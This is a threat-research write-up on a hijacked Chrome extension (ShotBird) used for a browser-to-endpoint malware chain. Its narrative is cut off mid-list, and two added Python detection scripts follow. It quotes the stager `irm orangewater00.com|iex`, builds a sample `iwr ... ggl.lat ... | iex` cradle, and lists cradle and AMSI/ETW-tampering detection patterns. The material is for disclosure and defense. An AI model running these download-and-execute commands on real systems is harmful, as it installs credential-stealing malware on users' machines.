From a Sophisticated Browser-Extension Supply-Chain Compromise to a VibeCoded Twist: A Chrome Extension as the Initial Access Vector for a Broader Malware Chain

March 8, 2026 - browser extension security, threat research, incident response, c2 analysis, extension malware

This write-up documents how a Featured extension was turned into a callback-driven malware channel using remote task scripts, fake update lures, and form-data capture.

Canonical repository: github.com/monxresearch-sec/shotbird-extension-malware-report

Open to security research opportunities (full-time or contract). Contact: monxresearch@gmail.com

TL;DR

A formerly legitimate Featured Chrome extension (ShotBird) was turned into a remote-controlled malware channel after an apparent ownership transfer. The malicious version beaconed to attacker infrastructure, received callback-delivered JavaScript tasks, stripped browser security headers, injected fake Chrome update lures, and captured sensitive form data.

In the observed Windows file-delivery path, victims were pushed to run googleupdate.exe, a fake update wrapper that carried a real Google-signed ChromeSetup.exe alongside a malicious psfx.msi stager. Host-side PowerShell Script Block Logging (Event ID 4104) later confirmed execution of the decoded stager `irm orangewater00.com|iex` and allowed reconstruction of a larger second stage with ETW suppression, Credential Manager access, Chromium data targeting, and upload logic.

In short: this was not just extension abuse, but a browser-to-endpoint compromise chain with likely credential-theft capability.

1) Intro

Extension Profile

Field                           Value
Extension Name                  ShotBird - Scrolling Screenshots, Tweet Images & Editor
Extension ID                    gengfhhkjekmlejbhmmopegofnoifnjp
Version (sample analyzed)       2.1
Manifest Version                3
Developer Email (current)       loraprice198865@gmail.com
Developer Email (pre-transfer)  akshayanuonline@gmail.com

Source: local manifest.json from the analyzed package and archived Chrome Web Store listing.
Launch Timeline (Short)

- November 2024: launch period; public announcement around Nov 6 and Firefox listing on Nov 2 (reddit).
- January 17, 2025: Chrome Web Store version 1.1 published and highlighted as Featured (chromewebstore.google).
- June 19, 2025: version 1.4 rebrand to "ShotBird - Scrolling Screenshots, Tweet Images & Editor" (chromewebstore.google).
- December 9, 2025: last archived Chrome Web Store snapshot still shows the original developer email akshayanuonline@gmail.com (web.archive.org).
- Currently (March 2026): developer contact changed to loraprice198865@gmail.com, consistent with an ownership/operator transfer occurring between December 2025 and the malicious activity window.

Notable Post-Launch Event

By February 2026, public reporting on X claimed ownership transfer and later malicious behavior, matching a known extension supply-chain risk (x).

2) How I Found It

I first caught this through amateur console logging left in callback-delivered scripts (out of nowhere, this started showing in Chrome's console on all sites).

Examples observed:

```javascript
console.log('Found update button')
console.log('Update button clicked')
console.log('initApp executed successfully')
console.warn('Update button not found, retrying...')
console.log('Setting up event handlers for mode: ', updateData.mode)
console.log('Found copy button')
console.log('Copy button clicked')
console.log('DOM fully loaded, setting up event handlers')
debugLog('Initializing grabber...')
debugLog('Grabber initialized')
debugLog(`Found ${inputs.length} form elements`)
```

What I found interesting about this:

- High-noise logs exposed behavior quickly in DevTools.
- debugLog() wrappers and mixed-language comments suggested low opsec, likely AI-assisted payload assembly.

Vibecoding indicators observed in callback payloads:

- Debug logging left throughout production payload code (console.log, console.warn, debugLog).
- Repeated // @ts-nocheck usage across scripts.
- Redundant retry/fallback patterns and duplicated handler wiring.
- Very large auto-expanded sensitive-input keyword list in the grabber.

Russian-language artifacts:

- Inline Russian comments appeared in injected script blocks (example: `// Запускаем initApp после загрузки DOM`, i.e. "Launch initApp after the DOM loads").
- English code mixed with Russian comments is consistent with a Russian-language prompt/development workflow.
- This is evidence of likely Russian-speaking operators, not definitive proof of nationality or location.

3) Investigation Method

- Static review of local extension logic (background.js, callback scripts).
- Live endpoint probing with self-registered UUIDs.
- Capture and review of callback-delivered scripts.
- Capture and review of remote template content from ggl.lat.

Identifier policy in this article:

- Victim UUID masked as xxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx.
- Probe UUIDs retained for reproducibility.

4) Findings At a Glance

Four callback task families were observed:

- History/page metadata beaconing.
- Fake...
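As an added example (not the author's tooling, and not code from the ShotBird package), the following Python script automates the static-review step above: it scans an unpacked extension for the vibecoding indicators listed (debug-log noise, `// @ts-nocheck`, Cyrillic comments, an inflated sensitive-input keyword list, dynamic code execution) and flags the manifest permissions that make header stripping and page injection possible. The sample manifest and task.js are constructed to mirror the artifacts quoted above; the permission mapping, keyword list and "suspicious" thresholds are assumptions of this example, not values taken from the real package.

```python
"""Static triage of an unpacked Chrome extension for the indicators listed
above (debug-log noise, // @ts-nocheck, non-English comments, dynamic code
execution, sensitive-input keyword lists) plus manifest permissions that make
header stripping and page injection possible. Added example for this write-up;
not the author's tooling and not ShotBird's code."""
import json
import re
import sys
from pathlib import Path

DEBUG_LOG_RE = re.compile(r"\b(?:console\.(?:log|warn|debug)|debugLog)\s*\(")
TS_NOCHECK_RE = re.compile(r"//\s*@ts-nocheck")
# A JS comment (// or block) that contains at least one Cyrillic letter.
CYRILLIC_COMMENT_RE = re.compile(r"(?://|/\*|^\s*\*).*[\u0400-\u04FF]", re.M)
DYNAMIC_EXEC_RE = re.compile(
    r"\b(?:eval|new\s+Function)\s*\(|\bchrome\.scripting\.executeScript\b")
# Assumed sample of what a form grabber targets; the real list was far larger.
SENSITIVE_KEYWORDS = ("password", "passwd", "cvv", "card", "ssn", "secret", "token", "otp")
BROAD_HOSTS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}
# Permissions a screenshot tool must justify (reviewer assumption, not ShotBird's manifest).
RISKY_PERMISSIONS = {
    "declarativeNetRequest": "modifyHeaders rules can remove CSP and other response headers",
    "declarativeNetRequestWithHostAccess": "same as declarativeNetRequest, on granted hosts",
    "webRequest": "can observe requests on granted hosts",
    "scripting": "can inject JavaScript into any granted page",
    "tabs": "can read tab URLs and titles (page-metadata beaconing)",
}


def scan_script(text):
    """Count the low-opsec / capability indicators in one JavaScript file."""
    lower = text.lower()
    return {
        "debug_logs": len(DEBUG_LOG_RE.findall(text)),
        "ts_nocheck": len(TS_NOCHECK_RE.findall(text)),
        "cyrillic_comments": len(CYRILLIC_COMMENT_RE.findall(text)),
        "dynamic_exec": len(DYNAMIC_EXEC_RE.findall(text)),
        "sensitive_keywords": sum(1 for k in SENSITIVE_KEYWORDS if k in lower),
    }


def scan_manifest(manifest):
    """Flag broad host access and permissions that enable the observed behaviour."""
    flags = []
    hosts = list(manifest.get("host_permissions", [])) + list(manifest.get("permissions", []))
    for cs in manifest.get("content_scripts", []):
        hosts += cs.get("matches", [])
    if any(h in BROAD_HOSTS for h in hosts):
        flags.append("broad host access: every site is in scope")
    for perm in manifest.get("permissions", []):
        if perm in RISKY_PERMISSIONS:
            flags.append(f"permission {perm}: {RISKY_PERMISSIONS[perm]}")
    return flags


def triage_extension(files):
    """files maps relative path -> content for manifest.json and *.js files."""
    manifest = json.loads(files.get("manifest.json", "{}"))
    report = {"manifest_flags": scan_manifest(manifest), "scripts": {}, "reasons": []}
    for path, text in files.items():
        if path.endswith(".js"):
            report["scripts"][path] = scan_script(text)
    for path, r in report["scripts"].items():
        if r["dynamic_exec"]:
            report["reasons"].append(f"{path}: dynamic code execution ({r['dynamic_exec']})")
        if r["cyrillic_comments"]:
            report["reasons"].append(f"{path}: Cyrillic comments ({r['cyrillic_comments']})")
        if r["ts_nocheck"]:
            report["reasons"].append(f"{path}: // @ts-nocheck present")
        if r["debug_logs"] >= 3:
            report["reasons"].append(f"{path}: {r['debug_logs']} debug log calls")
        if r["sensitive_keywords"] >= 3:
            report["reasons"].append(f"{path}: {r['sensitive_keywords']} sensitive-input keywords")
    # Thresholds are assumptions: two risky manifest traits plus two code indicators.
    report["suspicious"] = len(report["manifest_flags"]) >= 2 and len(report["reasons"]) >= 2
    return report


def load_from_dir(root):
    """Read manifest.json and every .js file under an unpacked extension directory."""
    root = Path(root)
    return {str(p.relative_to(root)): p.read_text(errors="replace")
            for p in root.rglob("*") if p.suffix == ".js" or p.name == "manifest.json"}


# Constructed sample mirroring the artifacts quoted above; not the real package.
SAMPLE_MANIFEST = {
    "manifest_version": 3, "name": "Example Screenshot Tool", "version": "2.1",
    "permissions": ["scripting", "declarativeNetRequest", "storage", "tabs"],
    "host_permissions": ["<all_urls>"],
    "background": {"service_worker": "background.js"},
}
SAMPLE_TASK_JS = r"""// @ts-nocheck
// Запускаем initApp после загрузки DOM
document.addEventListener('DOMContentLoaded', () => {
  console.log('DOM fully loaded, setting up event handlers');
  debugLog('Initializing grabber...');
  const inputs = document.querySelectorAll('input');
  debugLog(`Found ${inputs.length} form elements`);
  const keys = ['password', 'cvv', 'card', 'ssn'];
  const btn = document.querySelector('#update');
  if (!btn) { console.warn('Update button not found, retrying...'); }
  new Function(remoteCode)();
});
"""
SAMPLE_FILES = {"manifest.json": json.dumps(SAMPLE_MANIFEST), "task.js": SAMPLE_TASK_JS}

if __name__ == "__main__":
    files = load_from_dir(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE_FILES
    print(json.dumps(triage_extension(files), indent=2, ensure_ascii=False))
```

Run it with the path of an unpacked extension directory (for an installed Chrome extension, the profile's Extensions/<id>/<version>/ folder) and it prints the per-file counts plus the manifest flags; with no argument it runs on the constructed sample. The counts are triage signals, not a verdict: a legitimate extension can legitimately hold `<all_urls>` and `scripting`, which is exactly why the write-up's callback-delivered scripts, which never appear in the package, are the decisive artifact.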
The ShotBird campaign demonstrates a Chrome extension supply-chain compromise where a malicious actor gained control of a legitimate Featured extension (ID: gengfhhkjekmlejbhmmopegofnoifnjp) and used it as an initial access vector. The compromised extension beaconed to attacker infrastructure, executed remote JavaScript tasks, and delivered a fake Chrome update (googleupdate.exe) that installed a malicious MSI stager, leading to a host-level second stage with likely credential-theft capability. Defenders should audit installed extensions for unexpected ownership changes and monitor for suspicious PowerShell execution (Script Block Logging, Event ID 4104) and network connections to domains like orangewater00.com.
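The host-side hunt this summary recommends, as an added example (not the author's tooling): a small Python triage of PowerShell Script Block Logging (Event ID 4104) text that flags download cradles of the `irm <host>|iex` shape, extracts the contacted host and matches it against the infrastructure named in this write-up (orangewater00.com, ggl.lat), decodes `-EncodedCommand` blobs when a launcher command line is fed in, and trips a generic heuristic on ETW/AMSI tampering strings. The event records are constructed, the tampering string list is a generic heuristic rather than this campaign's second-stage code, and the IOC set contains only the two domains the page names.

```python
"""Triage of PowerShell Script Block Logging text (Event ID 4104) for the
download cradle recovered in this investigation (irm <host>|iex), for known
campaign infrastructure, and for generic ETW/AMSI tampering strings.
Added example; not the author's tooling. Event records below are constructed."""
import base64
import re

# Infrastructure named in the write-up.
CAMPAIGN_IOCS = {"orangewater00.com", "ggl.lat"}

DOWNLOADER_RE = re.compile(
    r"\b(?:irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring|downloaddata)\b")
EXEC_RE = re.compile(r"\b(?:iex|invoke-expression)\b|\[scriptblock\]::create\(")
URL_HOST_RE = re.compile(r"https?://([a-z0-9.-]+)")
# Bare host handed directly to a web cmdlet, as in `irm orangewater00.com|iex`.
BARE_HOST_RE = re.compile(
    r"\b(?:irm|iwr|invoke-restmethod|invoke-webrequest)\s+(?:-uri\s+)?['\"]?"
    r"(?:https?://)?((?:[a-z0-9-]+\.)+[a-z]{2,})")
ENCODED_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)
# Generic tampering tokens; a heuristic, not this campaign's specific second-stage code.
EVASION_RE = re.compile(r"etweventwrite|amsiutils|amsiinitfailed|amsiscanbuffer")


def normalize(text):
    """Collapse whitespace and lowercase; PowerShell is case-insensitive."""
    return re.sub(r"\s+", " ", text).strip().lower()


def decode_encoded_command(text):
    """Return the UTF-16LE plaintext of a -EncodedCommand argument, or None."""
    m = ENCODED_RE.search(text)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(text, iocs=CAMPAIGN_IOCS):
    """Classify one script block or launcher command line."""
    decoded = decode_encoded_command(text)
    # Drop the base64 blob itself so its characters cannot produce false token hits.
    body = normalize(ENCODED_RE.sub(" ", text) + " " + (decoded or ""))
    hosts = {h.strip(".") for h in URL_HOST_RE.findall(body) + BARE_HOST_RE.findall(body)}
    return {
        "cradle": bool(DOWNLOADER_RE.search(body) and EXEC_RE.search(body)),
        "hosts": sorted(hosts),
        "ioc_hits": sorted(h for h in hosts
                           if h in iocs or any(h.endswith("." + i) for i in iocs)),
        "evasion": bool(EVASION_RE.search(body)),
        "decoded": decoded,
    }


def triage_events(events, iocs=CAMPAIGN_IOCS):
    """Return only the events worth an analyst's attention, with the analysis attached."""
    findings = []
    for ev in events:
        result = analyze(ev["ScriptBlockText"], iocs)
        if result["cradle"] or result["ioc_hits"] or result["evasion"]:
            findings.append({"RecordId": ev["RecordId"], "Computer": ev["Computer"], **result})
    return findings


# Constructed events (not real logs). Event 3 models a launcher command line whose
# -enc blob decodes to a second cradle; event 4 only trips the tampering heuristic.
_ENC = base64.b64encode(
    "iwr https://ggl.lat/u.ps1 -UseBasicParsing | iex".encode("utf-16le")).decode()
SAMPLE_EVENTS = [
    {"RecordId": 1, "Computer": "WS-01", "ScriptBlockText": "irm orangewater00.com|iex"},
    {"RecordId": 2, "Computer": "WS-01",
     "ScriptBlockText": r"Get-ChildItem C:\Windows -Recurse | Select-Object Name"},
    {"RecordId": 3, "Computer": "WS-02",
     "ScriptBlockText": "powershell.exe -nop -w hidden -enc " + _ENC},
    {"RecordId": 4, "Computer": "WS-02",
     "ScriptBlockText": "$fn = 'EtwEventWrite'; Write-Host $fn"},
]

if __name__ == "__main__":
    for finding in triage_events(SAMPLE_EVENTS):
        print(finding)
```

To run this against real data, export Microsoft-Windows-PowerShell/Operational events with ID 4104 (Script Block Logging must be enabled for them to exist) and map each record's ScriptBlockText into the event dicts; 4688 or Sysmon process-creation command lines can be fed through the same `analyze()` so that `-EncodedCommand` launchers are caught before the decoded block is ever logged.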